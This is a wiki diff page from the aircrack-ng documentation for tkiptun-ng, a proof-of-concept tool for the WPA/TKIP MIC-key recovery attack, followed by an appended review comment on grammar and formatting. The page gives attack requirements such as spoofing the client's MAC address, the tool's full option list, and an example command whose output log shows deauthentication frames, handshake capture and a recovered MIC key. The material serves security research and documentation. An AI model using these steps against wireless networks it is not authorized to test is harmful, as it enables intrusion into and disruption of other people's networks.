tkiptun-ng

Differences

This shows you the differences between two versions of the page.

tkiptun-ng [2008/11/06 20:23] – created mister_x
tkiptun-ng [2009/09/26 20:41] – Fixed typos darkaudax
Line 1: Line 1:
-====== tkiptun-ng ======+====== Tkiptun-ng ======
  
 ===== Description ===== ===== Description =====
  
-It is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames in a WPA TKIP network with QoS.+NOTE: This documentation is still under development.  Please check back on a regular basis to obtain the latest updates.  If you have any feedback on the documentation, please post your comments to the [[http://forum.aircrack-ng.org|Forum]]. 
 + 
 +**IMPORTANT NOTE:** The tkiptun-ng SVN version is not fully working.  The final attack phase is not yet implemented.  The other portions are working with the ieee80211 drivers for RT73 and RTL8187L chipsets.  The madwifi-ng driver is definitely broken and is known to completely fail.  tkiptun-ng may work with other drivers but has not been tested so your mileage may vary. 
 + 
 +Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS.  He worked with Erik Tews (who created PTW attack) for a conference in [[http://pacsec.jp/|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA"
 + 
 +Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack.  This attack is described in the paper, [[http://dl.aircrack-ng.org/breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews.  The paper describes advanced attacks on WEP and the first practical attack on WPA.  An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article [[http://arstechnica.com/security/news/2008/11/wpa-cracked.ars/|Battered, but not broken: understanding the WPA crack]] by Glenn Fleishman. 
 + 
 +Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check).  This is done via [[chopchoptheory|chopchop]]-type method.  Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated. 
 + 
 +At this point, tkiptun-ng has recovered the MIC key  and knows a keystram for access point to client communication.  Subsequently, using the XOR file, you can create new packets and inject them.  The creation and injection are done using the other aircrack-ng suite tools. 
 + 
 +[[http://download.aircrack-ng.org/wiki-files/doc/tkip_master.pdf|Cryptanalysis of IEEE 802.11i TKIP]] by Finn Michael Halvorsen and Olav Haugen, June 2009 provides an excellent detailed description of how tkiptun-ng works.  As well, their paper includes detailed descriptions of many other attacks against WEP/WPA/WPA2. 
 + 
 +Please remember this is an extremely advanced attack.  You must possess advanced linux and aircrack-ng skills to use this tool.  DO NOT EXPECT support unless you can demonstrate you have these skills.  Novices will NOT BE SUPPORTED. 
 + 
 + 
 +===== General Requirements ===== 
 + 
 +Both the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs. 
 + 
 +The AP must be configured for WPA plus TKIP. 
 + 
 +A fairly long rekeying time must be in use such as 3600 seconds.  It should be at least 20 minutes. 
 + 
 + 
 +===== Specific Requirements ===== 
 + 
 +The network card MAC address used by tkiptun-ng needs to be set to the MAC address of the client you are attacking. 
 + 
 + 
 + 
 +===== Why? ===== 
 + 
 +This section is very preliminary.  As tkiptun-ng works, it goes through various phases.  People ask "Why is such and such done?" This section attempts to answer those questions. 
 + 
 +**Question:** \\ 
 +Why is the handshake gathered? 
 + 
 +**Answer:** \\ 
 +It is done for debugging reasons.  First, so  that the temporal keys in tkiptun can be calculated.  Second, check them against the calculated values from the plaintext packet. 
 + 
 +Another reason, is to check if the AP/client reuses the nonces after a mic shutdown. 
 + 
 + 
 +===== Usage ===== 
 + 
 +Usage: tkiptun-ng <options> <replay interface> 
 + 
 +Filter options: 
 + 
 +  * -d dmac   : MAC address, Destination 
 +  * -s smac   : MAC address, Source 
 +  *  -m len    : minimum packet length 
 +  *  -n len    : maximum packet length 
 +  * -t tods   : frame control, To      DS bit 
 +  * -f fromds : frame control, From    DS bit 
 +  * -D        : disable AP detection 
 + 
 +Replay options: 
 + 
 +  * -x nbpps  : number of packets per second 
 +  * -a bssid  : set Access Point MAC address 
 +  * -c dmac   : set Destination  MAC address 
 +  * -h smac   : set Source       MAC address 
 +  * -F        : choose first matching packet 
 +  * -e essid  : set target AP SSID 
 + 
 +Debug options: 
 + 
 +  * -K prga   : keystream for continuation 
 +  * -y file   : keystream-file for continuation 
 +  * -j        : inject FromDS packets 
 +  * -P pmk    : pmk for verification/vuln testing 
 +  * -p psk    : psk to calculate pmk with essid 
 + 
 +Source options: 
 + 
 +  * -i iface  : capture packets from this interface 
 +  * -r file   : extract packets from this pcap file 
 +\\ 
 +  *-''''-help              : Displays this usage screen 
 + 
 + 
 +===== Usage Examples ===== 
 + 
 +The example below is incomplete but it gives some idea of how it looks. 
 + 
 +Input: 
 + 
 +   tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0  
 + 
 +Output: 
 + 
 +   The interface MAC (00:0E:2E:C5:81:D3) doesn't match the specified MAC (-h). 
 +        ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D 
 +   Blub 2:38 E6 38 1C 24 15 1C CF  
 +   Blub 1:17 DD 0D 69 1D C3 1F EE  
 +   Blub 3:29 31 79 E7 E6 CF 8D 5E  
 +   15:06:48  Michael Test: Successful 
 +   15:06:48  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 
 +   15:06:48  Found specified AP 
 +   15:06:48  Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs] 
 +   15:06:54  Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs] 
 +   15:06:56  WPA handshake: 00:14:6C:7E:40:80 captured 
 +   15:06:56  Waiting for an ARP packet coming from the Client... 
 +   Saving chosen packet in replay_src-0305-150705.cap 
 +   15:07:05  Waiting for an ARP response packet coming from the AP... 
 +   Saving chosen packet in replay_src-0305-150705.cap 
 +   15:07:05  Got the answer! 
 +   15:07:05  Waiting 10 seconds to let encrypted EAPOL frames pass without interfering. 
 +    
 +   15:07:25  Offset   99 ( 0% done) | xor = B3 | pt = D3 |  103 frames written in 84468ms 
 +   15:08:32  Offset   98 ( 1% done) | xor = AE | pt = 80 |   64 frames written in 52489ms 
 +   15:09:45  Offset   97 ( 3% done) | xor = DE | pt = C8 |  131 frames written in 107407ms 
 +   15:11:05  Offset   96 ( 5% done) | xor = 5A | pt = 7A |  191 frames written in 156619ms 
 +   15:12:07  Offset   95 ( 6% done) | xor = 27 | pt = 02 |   21 frames written in 17221ms 
 +   15:13:11  Offset   94 ( 8% done) | xor = D8 | pt = AB |   41 frames written in 33625ms 
 +   15:14:12  Offset   93 (10% done) | xor = 94 | pt = 62 |   13 frames written in 10666ms 
 +   15:15:24  Offset   92 (11% done) | xor = DF | pt = 68 |  112 frames written in 91829ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:18:13  Offset   91 (13% done) | xor = A1 | pt = E1 |  477 frames written in 391139ms 
 +   15:19:32  Offset   90 (15% done) | xor = 5F | pt = B2 |  186 frames written in 152520ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:22:09  Offset   89 (16% done) | xor = 9C | pt = 77 |  360 frames written in 295200ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:26:10  Offset   88 (18% done) | xor = 0D | pt = 3E |  598 frames written in 490361ms 
 +   15:27:33  Offset   87 (20% done) | xor = 8C | pt = 00 |  230 frames written in 188603ms 
 +   15:28:38  Offset   86 (21% done) | xor = 67 | pt = 00 |   47 frames written in 38537ms 
 +   15:29:53  Offset   85 (23% done) | xor = AD | pt = 00 |  146 frames written in 119720ms 
 +   15:31:16  Offset   84 (25% done) | xor = A3 | pt = 00 |  220 frames written in 180401ms 
 +   15:32:23  Offset   83 (26% done) | xor = 28 | pt = 00 |   75 frames written in 61499ms 
 +   15:33:38  Offset   82 (28% done) | xor = 7C | pt = 00 |  141 frames written in 115619ms 
 +   15:34:40  Offset   81 (30% done) | xor = 02 | pt = 00 |   19 frames written in 15584ms 
 +   15:35:57  Offset   80 (31% done) | xor = C9 | pt = 00 |  171 frames written in 140221ms 
 +   15:37:13  Offset   79 (33% done) | xor = 38 | pt = 00 |  148 frames written in 121364ms 
 +   15:38:21  Offset   78 (35% done) | xor = 71 | pt = 00 |   84 frames written in 68872ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:40:55  Offset   77 (36% done) | xor = 8E | pt = 00 |  328 frames written in 268974ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:43:31  Offset   76 (38% done) | xor = 38 | pt = 00 |  355 frames written in 291086ms 
 +   15:44:37  Offset   75 (40% done) | xor = 79 | pt = 00 |   61 frames written in 50021ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:47:05  Offset   74 (41% done) | xor = 59 | pt = 00 |  269 frames written in 220581ms 
 +   15:48:30  Offset   73 (43% done) | xor = 14 | pt = 00 |  249 frames written in 204178ms 
 +   15:49:49  Offset   72 (45% done) | xor = 9A | pt = 00 |  183 frames written in 150059ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   15:52:32  Offset   71 (46% done) | xor = 03 | pt = 00 |  420 frames written in 344400ms 
 +   15:53:57  Offset   70 (48% done) | xor = 0E | pt = 00 |  239 frames written in 195980ms 
 +   Sleeping for 60 seconds.36 bytes still unknown 
 +   ARP Reply 
 +   Checking 192.168.x.y 
 +   15:54:11  Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:66 
 +    
 +   Saving plaintext in replay_dec-0305-155411.cap 
 +   Saving keystream in replay_dec-0305-155411.xor 
 +   15:54:11   
 +   Completed in 2816s (0.02 bytes/s) 
 +    
 +   15:54:11  AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42 
 +   15:54:11  Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112 
 +   15:54:11  Sent encrypted tkip ARP request to the client. 
 +   15:54:11  Wait for the mic countermeasure timeout of 60 seconds. 
 + 
 + 
 +===== Usage Tips ===== 
 + 
 +None at this time. 
 + 
 +===== Usage Troubleshooting ===== 
 + 
 +None at this time. 
  
-He worked a few weeks ago with Erik Tews (who created PTW attack) for a conference in [[http://pacsec.jp/|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA". 
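Review bot: The added Description paragraphs still carry several grammar slips that the revision summary says were fixed: "proof-of-concept implementation the WPA/TKIP attack" is missing "of", "An additional excellent references ... is this ars technica article" should be singular, "the MICHAEL algorithm is reversed the MIC key used to protect packets ... can be calculated" needs "and" (or a full stop) before "the MIC key", and "keystram" should read "keystream". In the Usage list, the last entry renders as `*-''''-help` because the double dash is being worked around with quote markup; wrapping it as %%--help%% (or a code span) would make it appear as `--help` like the other options, and the `-m len` / `-n len` bullets have one extra leading space compared with the rest of the list. In the Usage Examples output, the closing line "AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42" names a different address from the BSSID given on the command line (-a 00:14:6C:7E:40:80) and in "WPA handshake: 00:14:6C:7E:40:80 captured"; a sentence explaining where that address comes from (for instance whether it is read out of the decrypted ARP reply shown just above it rather than from the beacon) would stop readers assuming the example targets the wrong AP. Finally, the General Requirements sentence "Both the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs" reads better as "Both the AP and the client must support QoS, which some APs call Wi-Fi Multimedia (WMM)".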
tkiptun-ng.txt · Last modified: 2009/09/27 16:01 by darkaudax